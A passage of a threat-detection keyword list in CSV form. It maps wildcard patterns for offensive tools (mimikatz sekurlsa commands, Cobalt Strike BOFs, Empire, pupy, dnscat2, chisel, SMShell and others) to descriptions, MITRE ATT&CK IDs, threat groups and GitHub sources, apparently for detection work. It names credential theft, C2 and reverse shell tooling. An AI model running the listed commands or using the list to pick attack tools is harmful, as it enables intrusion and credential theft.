- T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::tickets*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::trust*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::tspkg*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sekurlsa::wdigest*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*SELECT * FROM EvilSignature*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*SELECT * FROM EvilSignature*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*SELECT displayName FROM AntiVirusProduct*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,0,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*SELECT SYSTEM_USER as 'Logged in as'* CURRENT_USER as 'Mapped as'*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*self_delete.x64.o*,offensive_tool_keyword,cobaltstrike,BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/EspressoCake/Self_Deletion_BOF,1,1,N/A,10,10,159,22,2021-10-03T19:10:21Z,2021-10-03T19:01:14Z -*Self_Deletion_BOF*,offensive_tool_keyword,cobaltstrike,BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Self_Deletion_BOF,1,1,N/A,10,10,159,22,2021-10-03T19:10:21Z,2021-10-03T19:01:14Z -*-selfdelete.exe -d:selfdelete*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*SeManageVolumeExploit.*,offensive_tool_keyword,SeManageVolumeExploit,This exploit grants full permission on C:\ drive for all users on the machine,T1046 - T1098 - T1222.002,TA0007 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/CsEnox/SeManageVolumeExploit,1,1,N/A,10,1,44,13,2023-05-29T05:41:16Z,2021-10-11T01:17:04Z 
-*SeManageVolumeExploit-main,offensive_tool_keyword,SeManageVolumeExploit,This exploit grants full permission on C:\ drive for all users on the machine,T1046 - T1098 - T1222.002,TA0007 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/CsEnox/SeManageVolumeExploit,1,1,N/A,10,1,44,13,2023-05-29T05:41:16Z,2021-10-11T01:17:04Z -*Semperis/GoldenGMSA*,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,1,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*send \*\[ \\*\$BASH\\* = \\*/bin/bash\\* -o \\*\$SHELL\\* = \\*/bin/bash\\* \]*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*Send the payload with the grooms*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*send_ps1_payload*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*send_shellcode_via_pipe*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOFs) for shells and lols,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/BOFs,1,1,N/A,10,10,104,12,2021-09-14T09:03:58Z,2021-08-27T10:04:12Z -*send_shellcode_via_pipe*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*Send-CalendarNTLMLeak *,offensive_tool_keyword,POC,CVE-2023-23397 POC Powershell exploit,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/api0cradle/CVE-2023-23397-POC-Powershell,1,0,N/A,N/A,4,340,64,2023-03-17T07:47:40Z,2023-03-16T19:43:39Z -*sendmail -osendmail chmod +x sendmail*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Web Attacks,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z 
-*sense2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*sensepost/goDoH*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*sensepost/reGeorg*,offensive_tool_keyword,reGeorg,The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.,T1090 - T1095 - T1572,TA0002 - TA0007 - ,N/A,N/A,Data Exfiltration,https://github.com/sensepost/reGeorg,1,1,N/A,N/A,10,2828,844,2020-11-04T10:36:24Z,2014-08-08T00:58:12Z -*sensepost/ruler*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*sensepost/wiresocks*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,1,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*sensitive_files_win.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Sensitivelocalfiles.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*senzee1984/micr0_shell*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*seriously_nothing_shady_here*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*serve_ps1_payload*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Server enforces NLA; switching to 'fake server' mode*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*server*-relay.screenconnect.com*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,screenconnect.com,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*server.py generate --address * --port * --output * --source*,offensive_tool_keyword,SillyRAT,A Cross Platform multifunctional (Windows/Linux/Mac) RAT.,T1055.003 - T1027 - T1105 - T1005,TA0002 - TA0003 - TA0008 - 
TA0011,N/A,N/A,POST Exploitation tools,https://github.com/hash3liZer/SillyRAT,1,0,N/A,N/A,6,594,151,2023-06-23T18:49:43Z,2020-05-10T17:37:37Z -*server/modules/csharp/*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*server@egress-asses.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*server=*port=53531*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - 
T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,0,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*-server=http://127.0.0.1:4002*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*server-7566091c4e4a2a24.js*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*server-console.exe +*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,0,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*server-console.py --mifi-ip *,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,0,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*--server-port * --server-ip * --proxy-ip * --proxy-port *,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,0,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*serverscan.linux.elf*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan.linux.so*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverScan.win.cna*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 